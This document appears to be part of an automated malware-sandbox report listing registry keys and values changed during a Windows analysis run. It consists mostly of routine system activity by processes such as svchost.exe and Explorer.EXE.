Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-1537126222-899333903-2037027349-1000\ValidDeviceId = "02plduylgqipnkri"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\Flags = "8256"	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02rsyunriivtushc\Response Wednesday, February 05, 2025 00:24:35 = "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"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1738715147"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-1537126222-899333903-2037027349-1000\02plduylgqipnkri\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 05 Feb 2025 00:25:49 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02osziddmcukogyz\DeviceId = "<Data LastUpdatedTime=\"1738715075\"><User username=\"02OSZIDDMCUKOGYZ\"><HardwareInfo BoundTime=\"1738715075\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02osziddmcukogyz	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-1537126222-899333903-2037027349-1000\02plduylgqipnkri\DeviceId = "<Data><User username=\"02PLDUYLGQIPNKRI\"/></Data>\r\n"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-1537126222-899333903-2037027349-1000\02plduylgqipnkri\DeviceId = "<Data><User username=\"02PLDUYLGQIPNKRI\"><HardwareInfo BoundTime=\"1738715078\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02osziddmcukogyz	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02osziddmcukogyz\Provision Wednesday, February 05, 2025 00:24:34 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAIZIgg5x6P0WxqgyWxxAoggAAAAACAAAAAAAQZgAAAAEAACAAAACUd6iRzegT5d2oUgxIi546a3wVPEYP3LJvOWnAQcqwdwAAAAAOgAAAAAIAACAAAAACEUvsGbhYPZVzUJiXlHcUl2CnVo7wrqabK3b/kyDjCCAAAABDs4jHJGH4lgt/OhEYwwaB1AXhlE/m8UIol8Hkoh9+mUAAAADxskqz6qKKuJfg29B0NMrtoeDw0a2b6nfcs5R150MMubTrmcC6XVTaBrL6RIn/hum2z273E5C/dgcvm1DxBd5y"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133831888227151777"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02osziddmcukogyz\DeviceId = "<Data LastUpdatedTime=\"1738715075\"><User username=\"02OSZIDDMCUKOGYZ\"><HardwareInfo BoundTime=\"1738715076\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n"	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApiGroup = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoftwindows.client.cbs_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup"	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{B3690E58-E961-423B-B687-386EBFD83239}	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\637bf50d-b4e6-485a-8057-4f72c56a = bdd9a77f6477db01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\637bf50d-b4e6-485a-8057-4f72c56a = "\\\\?\\Volume{D7B304FE-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{18d9554d-3c5b-4c1e-8b24-222f843ebeeb}\\ConstraintIndex.cab"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000003070bd48b018db018807eb70b818db01656aed70b818db0114000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApi\Cach = ":BackgroundTransferApi:"	DllHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApi\Cach = "0"	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApiGroup = "9"	DllHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\637bf50d-b4e6-485a-8057-4f72c56a = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApi\Cach = "9"	DllHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\Registry\User\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\NotificationData	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000e0859ff2f94f6810ab9108002b27b3d90500000058000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\637bf50d-b4e6-485a-8057-4f72c56a = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\NodeSlot = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApiGroup = "1"	DllHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe110000003070bd48b018db010d20006cb818db010d20006cb818db0114000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApiGroup = "0"	DllHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\637bf50d-b4e6-485a-8057-4f72c56a	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2"	Explorer.EXE
